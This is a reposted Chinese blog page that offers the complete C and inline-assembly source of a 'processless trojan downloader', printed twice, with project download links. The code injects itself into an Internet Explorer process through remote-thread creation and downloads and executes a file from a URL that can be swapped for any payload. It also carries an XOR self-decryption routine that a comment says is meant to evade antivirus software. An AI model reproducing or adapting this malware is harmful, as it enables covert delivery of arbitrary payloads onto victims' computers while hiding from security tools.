VC无进程木马下载器源码
来源:互联网 发布:linux 进程的运行时间 编辑:程序博客网 时间:2024/04/18 17:06
一、 打开半年前的一个工程,是利用IE来隐藏进程下载的实例,我想灰鸽子也是类似原理吧!
下面是程序的主要思路:
1.获取程序自身路径,启动IE进程
2.获取到IE进程句柄
3.分配内存
4.获取进程映像的地址
5.得到内存镜像大小
6.确定起始基址和内存映像基址的位置
7.写内存,创建线程,写数据
8.建立远程线程并运行,关闭对象
二、下面是源码 ,举例下载迅雷而矣:
- view plaincopy to clipboardprint?
- /*
- VC无进程木马下载器
- By: Kardinal and 寂寞的狼
- 2009.3.10
- */
- #include <windows.h>
- #pragma comment(lib,"user32.lib")
- #pragma comment(lib,"kernel32.lib")
- //取消这4行的注释,可编译出2K大的文件
- //#pragma comment(linker,"/OPT:NOWIN98")
- //#pragma comment(linker,"/merge:.data=.text")
- //#pragma comment(linker,"/merge:.rdata=.text")
- //#pragma comment(linker,"/align:0x200")
- #pragma comment(linker,"/ENTRY:decrpt")
- #pragma comment(linker,"/subsystem:windows")
- #pragma comment(linker,"/BASE:0x13150000")
- //动态加载shell32.dll中的ShellExecuteA函数
- HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR,LPCTSTR,LPCTSTR,LPCTSTR,int);
- //动态加载Urlmon.dll中的UrlDownloadToFileA函数
- DWORD (WINAPI *DOWNFILE)(LPCTSTR,LPCTSTR,LPCTSTR,DWORD,LPCTSTR);
- //建立远程线程,并运行
- HANDLE (WINAPI *MYINJECT) (HANDLE, LPSECURITY_ATTRIBUTES, DWORD,LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD);
- void decrpt();
- HANDLE processhandle;
- DWORD pid;
- HINSTANCE hshell,hurlmon,hkernel;// HINSTANCE与HMOUDLE是通用
- // 注入使用的下载函数
- void download()
- {
- hshell = LoadLibrary("Shell32.dll");
- hurlmon = LoadLibrary("urlmon.dll");
- (FARPROC&)SHELLRUN = GetProcAddress(hshell,"ShellExecuteA");
- (FARPROC&)DOWNFILE = GetProcAddress(hurlmon,"UrlDownloadToFileA");
- //下载的文件自行调整
- DOWNFILE(NULL,"http://down.sandai.net/Thunder5.9.5.990.exe","C://xunlei.exe",0,NULL);
- SHELLRUN(0,"open","C://xunlei.exe",NULL,NULL,5);
- ExitProcess(0);
- }
- void main()
- {
- char iename[MAX_PATH],iepath[MAX_PATH];
- ZeroMemory(iename,sizeof(iename));
- ZeroMemory(iepath,sizeof(iepath));
- // 1.获取程序自身路径,启动IE进程
- GetWindowsDirectory(iepath,MAX_PATH);
- strncpy(iename,iepath,3);
- strcat(iename,"C://Program Files//Internet Explorer//IEXPLORE.EXE");
- WinExec(iename,SW_SHOWNORMAL);
- Sleep(500);
- // 2.得到IE进程句柄
- HWND htemp;
- htemp = FindWindow("IEFrame",NULL);
- GetWindowThreadProcessId(htemp,&pid);
- // 3.分配内存
- HMODULE Module;
- LPVOID NewModule;
- DWORD Size;
- LPDWORD lpimagesize;
- // 4.进程映像的地址
- Module = GetModuleHandle(NULL);
- // 5.得到内存镜像大小
- _asm
- {
- push eax;
- push ebx;
- mov ebx,Module;
- mov eax,[ebx+0x3c];
- lea eax,[ebx+eax+0x50];
- mov eax,[eax]
- mov lpimagesize,eax;
- pop ebx;
- pop eax;
- };
- Size=(DWORD)lpimagesize;
- // 确定起始基址和内存映像基址的位置
- NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
- // 6.写内存,创建线程,写数据
- WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);
- LPTHREAD_START_ROUTINE entrypoint;
- __asm
- {
- push eax;
- lea eax,download;
- mov entrypoint,eax;
- pop eax
- }
- hkernel=LoadLibrary("KERNEL32.dll");
- (FARPROC&)MYINJECT= GetProcAddress(hkernel,"CreateRemoteThread");
- MYINJECT(processhandle, NULL, 0, entrypoint, Module, 0, NULL); //建立远程线程,并运行
- // 7.关闭对象
- CloseHandle(processhandle);
- return;
- } ;
- // 解密函数
- void decrpt()
- {
- HANDLE myps;
- DWORD oldAttr;
- BYTE shellcode[500];
- ZeroMemory(shellcode,sizeof(shellcode));
- myps=GetCurrentProcess();
- ::VirtualProtectEx(myps,&download,0x1000,PAGE_EXECUTE_READWRITE,&oldAttr);
- //先把原代码,搬移到变量中保存起来
- _asm
- {
- pushad;
- lea esi,download;
- lea edi,shellcode;
- lea ecx,decrpt;
- sub ecx,esi;
- en1:
- lodsb;
- stosb;
- dec ecx;
- jne en1;
- popad;
- };
- //解密搬回
- int i;
- for (i=1;i<=0xFF;i++)
- {
- _asm
- {
- pushad;
- lea esi,shellcode;
- lea edi,download;
- lea ecx,decrpt;
- sub ecx,edi;
- en2:
- lodsb;
- mov ebx,i;
- xor al,bl;
- stosb;
- dec ecx;
- jne en2;
- popad;
- };
- //此结构的的作用在于使一般的杀毒软件无法探测出来是病毒.
- __try
- {
- main();
- return;
- }
- __except(EXCEPTION_EXECUTE_HANDLER)
- {
- };
- }
- return;
- }
- /*
- VC无进程木马下载器
- By: Kardinal and 寂寞的狼
- 2009.3.10
- */
- #include <windows.h>
- #pragma comment(lib,"user32.lib")
- #pragma comment(lib,"kernel32.lib")
- //取消这4行的注释,可编译出2K大的文件
- //#pragma comment(linker,"/OPT:NOWIN98")
- //#pragma comment(linker,"/merge:.data=.text")
- //#pragma comment(linker,"/merge:.rdata=.text")
- //#pragma comment(linker,"/align:0x200")
- #pragma comment(linker,"/ENTRY:decrpt")
- #pragma comment(linker,"/subsystem:windows")
- #pragma comment(linker,"/BASE:0x13150000")
- //动态加载shell32.dll中的ShellExecuteA函数
- HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR,LPCTSTR,LPCTSTR,LPCTSTR,int);
- //动态加载Urlmon.dll中的UrlDownloadToFileA函数
- DWORD (WINAPI *DOWNFILE)(LPCTSTR,LPCTSTR,LPCTSTR,DWORD,LPCTSTR);
- //建立远程线程,并运行
- HANDLE (WINAPI *MYINJECT) (HANDLE, LPSECURITY_ATTRIBUTES, DWORD,LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD);
- void decrpt();
- HANDLE processhandle;
- DWORD pid;
- HINSTANCE hshell,hurlmon,hkernel;// HINSTANCE与HMOUDLE是通用
- // 注入使用的下载函数
- void download()
- {
- hshell = LoadLibrary("Shell32.dll");
- hurlmon = LoadLibrary("urlmon.dll");
- (FARPROC&)SHELLRUN = GetProcAddress(hshell,"ShellExecuteA");
- (FARPROC&)DOWNFILE = GetProcAddress(hurlmon,"UrlDownloadToFileA");
- //下载的文件自行调整
- DOWNFILE(NULL,"http://down.sandai.net/Thunder5.9.5.990.exe","C://xunlei.exe",0,NULL);
- SHELLRUN(0,"open","C://xunlei.exe",NULL,NULL,5);
- ExitProcess(0);
- }
- void main()
- {
- char iename[MAX_PATH],iepath[MAX_PATH];
- ZeroMemory(iename,sizeof(iename));
- ZeroMemory(iepath,sizeof(iepath));
- // 1.获取程序自身路径,启动IE进程
- GetWindowsDirectory(iepath,MAX_PATH);
- strncpy(iename,iepath,3);
- strcat(iename,"C://Program Files//Internet Explorer//IEXPLORE.EXE");
- WinExec(iename,SW_SHOWNORMAL);
- Sleep(500);
- // 2.得到IE进程句柄
- HWND htemp;
- htemp = FindWindow("IEFrame",NULL);
- GetWindowThreadProcessId(htemp,&pid);
- // 3.分配内存
- HMODULE Module;
- LPVOID NewModule;
- DWORD Size;
- LPDWORD lpimagesize;
- // 4.进程映像的地址
- Module = GetModuleHandle(NULL);
- // 5.得到内存镜像大小
- _asm
- {
- push eax;
- push ebx;
- mov ebx,Module;
- mov eax,[ebx+0x3c];
- lea eax,[ebx+eax+0x50];
- mov eax,[eax]
- mov lpimagesize,eax;
- pop ebx;
- pop eax;
- };
- Size=(DWORD)lpimagesize;
- // 确定起始基址和内存映像基址的位置
- NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
- // 6.写内存,创建线程,写数据
- WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);
- LPTHREAD_START_ROUTINE entrypoint;
- __asm
- {
- push eax;
- lea eax,download;
- mov entrypoint,eax;
- pop eax
- }
- hkernel=LoadLibrary("KERNEL32.dll");
- (FARPROC&)MYINJECT= GetProcAddress(hkernel,"CreateRemoteThread");
- MYINJECT(processhandle, NULL, 0, entrypoint, Module, 0, NULL); //建立远程线程,并运行
- // 7.关闭对象
- CloseHandle(processhandle);
- return;
- } ;
- // 解密函数
- void decrpt()
- {
- HANDLE myps;
- DWORD oldAttr;
- BYTE shellcode[500];
- ZeroMemory(shellcode,sizeof(shellcode));
- myps=GetCurrentProcess();
- ::VirtualProtectEx(myps,&download,0x1000,PAGE_EXECUTE_READWRITE,&oldAttr);
- //先把原代码,搬移到变量中保存起来
- _asm
- {
- pushad;
- lea esi,download;
- lea edi,shellcode;
- lea ecx,decrpt;
- sub ecx,esi;
- en1:
- lodsb;
- stosb;
- dec ecx;
- jne en1;
- popad;
- };
- //解密搬回
- int i;
- for (i=1;i<=0xFF;i++)
- {
- _asm
- {
- pushad;
- lea esi,shellcode;
- lea edi,download;
- lea ecx,decrpt;
- sub ecx,edi;
- en2:
- lodsb;
- mov ebx,i;
- xor al,bl;
- stosb;
- dec ecx;
- jne en2;
- popad;
- };
- //此结构的的作用在于使一般的杀毒软件无法探测出来是病毒.
- __try
- {
- main();
- return;
- }
- __except(EXCEPTION_EXECUTE_HANDLER)
- {
- };
- }
- return;
- }
三、工程及源码下载地址:
http://download.csdn.net/source/1546155
http://www.rayfile.com/files/77ea8ad9-80ff-11de-aeb2-0014221b798a/
- VC无进程木马下载器源码
- 【转自koma】 VC无进程木马下载器源码
- VC无进程木马下载器源码(利用IE隐藏进程)
- VC无进程木马下载器源码(利用IE隐藏进程)
- 无进程DLL木马
- 无dll无进程木马
- 无dll无进程木马源代码
- 无Dll无进程木马源代码
- 无dll无进程木马源代码
- 无dll无进程木马源代码
- 无Dll插入进程,下载者VC源代码
- 无Dll插入进程、下载者VC源代码
- 无dll插入进程,下载者vc源代码
- vc++编写一个木马下载器,体积仅有0.3K
- vc++编写一个木马下载器,体积仅有0.3K
- VC++实现获取进程端口检测木马
- VC++实现获取进程端口检测木马
- VC++盗号木马源码分析
- 我毕业以来第一次跳槽
- vsftp配置
- ASP.NET文件上传,为每个用户建立一个上传目录
- 六问平台迁移
- 服务器定时备份测试
- VC无进程木马下载器源码
- 语言复杂声明的解析(csdn转)
- 游戏资源
- 祝福!
- C和C++中的CONST
- vs2005奇怪的断点无效问题
- 网上支付原理
- 工商银行网上支付开发
- 无法将类型“string”隐式转换为“char